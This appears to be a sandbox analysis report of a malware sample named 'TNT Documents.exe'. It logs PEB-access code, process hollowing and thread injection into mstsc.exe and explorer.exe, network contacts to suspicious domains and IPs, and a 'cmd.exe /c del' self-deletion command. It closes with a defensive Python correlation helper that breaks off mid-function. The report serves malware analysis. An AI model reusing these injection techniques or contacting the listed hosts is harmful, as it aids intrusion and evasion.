Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568740D mov eax, dword ptr fs:[00000030h] 17_2_0568740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568740D mov eax, dword ptr fs:[00000030h] 17_2_0568740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568740D mov eax, dword ptr fs:[00000030h] 17_2_0568740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h] 17_2_05636C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h] 17_2_05636C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h] 17_2_05636C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h] 17_2_05636C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EBC2C mov eax, dword ptr fs:[00000030h] 17_2_055EBC2C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h] 17_2_05636CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h] 17_2_05636CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h] 17_2_05636CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056714FB mov eax, dword ptr fs:[00000030h] 17_2_056714FB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688CD6 mov eax, dword ptr fs:[00000030h] 17_2_05688CD6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C849B mov eax, dword ptr fs:[00000030h] 17_2_055C849B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688F6A mov eax, dword ptr fs:[00000030h] 17_2_05688F6A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CEF40 mov eax, dword ptr fs:[00000030h] 17_2_055CEF40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CFF60 mov eax, dword ptr fs:[00000030h] 17_2_055CFF60
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DF716 mov eax, dword ptr fs:[00000030h] 17_2_055DF716
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h] 17_2_055EA70E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h] 17_2_055EA70E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568070D mov eax, dword ptr fs:[00000030h] 17_2_0568070D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568070D mov eax, dword ptr fs:[00000030h] 17_2_0568070D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EE730 mov eax, dword ptr fs:[00000030h] 17_2_055EE730
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h] 17_2_0564FF10
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h] 17_2_0564FF10
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h] 17_2_055B4F2E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h] 17_2_055B4F2E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F37F5 mov eax, dword ptr fs:[00000030h] 17_2_055F37F5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C8794 mov eax, dword ptr fs:[00000030h] 17_2_055C8794
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637794 mov eax, dword ptr fs:[00000030h] 17_2_05637794
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637794 mov eax, dword ptr fs:[00000030h] 17_2_05637794
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637794 mov eax, dword ptr fs:[00000030h] 17_2_05637794
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h] 17_2_0567AE44
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h] 17_2_0567AE44
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C766D mov eax, dword ptr fs:[00000030h] 17_2_055C766D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h] 17_2_055EA61C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h] 17_2_055EA61C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566FE3F mov eax, dword ptr fs:[00000030h] 17_2_0566FE3F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h] 17_2_055BC600
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h] 17_2_055BC600
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h] 17_2_055BC600
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E8E00 mov eax, dword ptr fs:[00000030h] 17_2_055E8E00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671608 mov eax, dword ptr fs:[00000030h] 17_2_05671608
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BE620 mov eax, dword ptr fs:[00000030h] 17_2_055BE620
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E36CC mov eax, dword ptr fs:[00000030h] 17_2_055E36CC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F8EC7 mov eax, dword ptr fs:[00000030h] 17_2_055F8EC7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566FEC0 mov eax, dword ptr fs:[00000030h] 17_2_0566FEC0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688ED6 mov eax, dword ptr fs:[00000030h] 17_2_05688ED6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E16E0 mov ecx, dword ptr fs:[00000030h] 17_2_055E16E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C76E2 mov eax, dword ptr fs:[00000030h] 17_2_055C76E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056346A7 mov eax, dword ptr fs:[00000030h] 17_2_056346A7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h] 17_2_05680EA5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h] 17_2_05680EA5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h] 17_2_05680EA5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564FE87 mov eax, dword ptr fs:[00000030h] 17_2_0564FE87
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h] 17_2_055DB944
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h] 17_2_055DB944
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h] 17_2_055BB171
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h] 17_2_055BB171
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BC962 mov eax, dword ptr fs:[00000030h] 17_2_055BC962
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h] 17_2_055B9100
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h] 17_2_055B9100
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h] 17_2_055B9100
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E513A mov eax, dword ptr fs:[00000030h] 17_2_055E513A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E513A mov eax, dword ptr fs:[00000030h] 17_2_055E513A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov ecx, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056441E8 mov eax, dword ptr fs:[00000030h] 17_2_056441E8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h] 17_2_055BB1E1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h] 17_2_055BB1E1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h] 17_2_055BB1E1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056369A6 mov eax, dword ptr fs:[00000030h] 17_2_056369A6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2990 mov eax, dword ptr fs:[00000030h] 17_2_055E2990
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA185 mov eax, dword ptr fs:[00000030h] 17_2_055EA185
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h] 17_2_056351BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h] 17_2_056351BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h] 17_2_056351BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h] 17_2_056351BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DC182 mov eax, dword ptr fs:[00000030h] 17_2_055DC182
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h] 17_2_055E61A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h] 17_2_055E61A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h] 17_2_055D0050
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h] 17_2_055D0050
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05672073 mov eax, dword ptr fs:[00000030h] 17_2_05672073
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05681074 mov eax, dword ptr fs:[00000030h] 17_2_05681074
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h] 17_2_05637016
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h] 17_2_05637016
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h] 17_2_05637016
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h] 17_2_055CB02A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h] 17_2_055CB02A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h] 17_2_055CB02A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h] 17_2_055CB02A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05684015 mov eax, dword ptr fs:[00000030h] 17_2_05684015
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05684015 mov eax, dword ptr fs:[00000030h] 17_2_05684015
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov ecx, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B58EC mov eax, dword ptr fs:[00000030h] 17_2_055B58EC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B9080 mov eax, dword ptr fs:[00000030h] 17_2_055B9080
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EF0BF mov ecx, dword ptr fs:[00000030h] 17_2_055EF0BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h] 17_2_055EF0BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h] 17_2_055EF0BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05633884 mov eax, dword ptr fs:[00000030h] 17_2_05633884
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05633884 mov eax, dword ptr fs:[00000030h] 17_2_05633884
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F90AF mov eax, dword ptr fs:[00000030h] 17_2_055F90AF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BF358 mov eax, dword ptr fs:[00000030h] 17_2_055BF358
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BDB40 mov eax, dword ptr fs:[00000030h] 17_2_055BDB40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h] 17_2_055E3B7A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h] 17_2_055E3B7A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688B58 mov eax, dword ptr fs:[00000030h] 17_2_05688B58
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BDB60 mov ecx, dword ptr fs:[00000030h] 17_2_055BDB60
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567131B mov eax, dword ptr fs:[00000030h] 17_2_0567131B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056353CA mov eax, dword ptr fs:[00000030h] 17_2_056353CA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056353CA mov eax, dword ptr fs:[00000030h] 17_2_056353CA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DDBE9 mov eax, dword ptr fs:[00000030h] 17_2_055DDBE9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2397 mov eax, dword ptr fs:[00000030h] 17_2_055E2397
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05685BA5 mov eax, dword ptr fs:[00000030h] 17_2_05685BA5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EB390 mov eax, dword ptr fs:[00000030h] 17_2_055EB390
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h] 17_2_055C1B8F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h] 17_2_055C1B8F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566D380 mov ecx, dword ptr fs:[00000030h] 17_2_0566D380
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567138A mov eax, dword ptr fs:[00000030h] 17_2_0567138A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h] 17_2_055E4BAD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h] 17_2_055E4BAD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h] 17_2_055E4BAD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h] 17_2_0566B260
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h] 17_2_0566B260
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\TNT Documents.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00409B50 LdrLoadDll, 7_2_00409B50
Source: C:\Users\user\Desktop\TNT Documents.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.metronixmedical.com
Source: C:\Windows\explorer.exe Domain query: www.specialtyplastics.online
Source: C:\Windows\explorer.exe Network Connect: 51.255.30.106 80
Source: C:\Windows\explorer.exe Network Connect: 119.18.54.99 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.cortepuroiberico.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80
Source: C:\Windows\explorer.exe Domain query: www.coached.info
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\TNT Documents.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: EC0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\TNT Documents.exe Memory written: C:\Users\user\Desktop\TNT Documents.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\TNT Documents.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\TNT Documents.exe Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 3292
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319293642.0000000005F40000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.336206590.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.314892260.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.294735677.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000000B.00000000.344277023.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.323053985.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj
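The injection signatures above are individually weak (a thread-context change or a memory write on its own has benign uses) and only become a hollowing verdict when correlated per source process. The following triage helper is an added example, not code from this report, from Joe Sandbox or from the FormBook family: it parses the `Source: <process> <event>: <detail>` line shape used above, combines the spawn of a child, the write of an MZ header at that child's image base and the thread-context change into one process-hollowing finding, and flags the APC queue, the RWX section mapped into explorer.exe and the cmd.exe self-deletion separately. The input lines are the ones from this section, copied without the link text; the suspended-create flag is not part of these lines, so the rule keys on the spawn instead. The rule logic and the ATT&CK labels are this example's own mapping, not the report's.

```python
"""Correlate sandbox behaviour lines into an injection chain.

Added triage helper, not part of the Joe Sandbox report or of FormBook.
It parses the "Source: <process> <event>: <detail>" line shape this report
prints and applies its own correlation rules; the MITRE ATT&CK labels are
this example's mapping, not the report's.
"""
import re
from dataclasses import dataclass

# Constructed input: the lines of this report's injection section, copied
# without the "Jump to behavior" link text.
SAMPLE_PATH = r"C:\Users\user\Desktop\TNT Documents.exe"
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}",
    r"Source: C:\Users\user\Desktop\TNT Documents.exe Memory written: C:\Users\user\Desktop\TNT Documents.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\Desktop\TNT Documents.exe Thread register set: target process: 3292",
    r"Source: C:\Users\user\Desktop\TNT Documents.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 3292",
    r'Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"',
]

EVENTS = ("Process created", "Memory written", "Thread register set",
          "Thread APC queued", "Section loaded")
LINE_RE = re.compile("^Source: (?P<source>.+?) (?P<event>" + "|".join(EVENTS) + r"): (?P<detail>.*)$")
PROC_RE = re.compile(r"^(?P<image>.+?\.exe)\s*(?P<cmdline>.*)$", re.I)
WRITE_RE = re.compile(r"^(?P<target>.+?\.exe) base: (?P<base>[0-9a-f]+) value starts with: (?P<magic>[0-9a-f]+)$", re.I)
TARGET_RE = re.compile(r"^target process: (?P<target>.+)$")
SECTION_RE = re.compile(r"^unknown target: (?P<target>.+?) protection: (?P<prot>.+)$")
DEL_RE = re.compile(r'/c\s+del\s+"?(?P<path>[^"]+?)"?\s*$', re.I)


@dataclass
class Finding:
    technique: str   # label carrying this example's ATT&CK mapping
    source: str      # process that performed the action
    evidence: str    # the detail that triggered the rule


def parse(lines):
    """Yield (source, event, detail) for every line in the report's shape."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m["source"], m["event"], m["detail"]


def analyze(lines, sample_path):
    """Apply the correlation rules and return the list of findings."""
    findings = []
    created = {}     # source -> set of child images it spawned
    mz_writes = {}   # source -> {(target image, base)} written with an MZ header
    ctx_set = set()  # sources that set a thread context in another process
    for src, event, detail in parse(lines):
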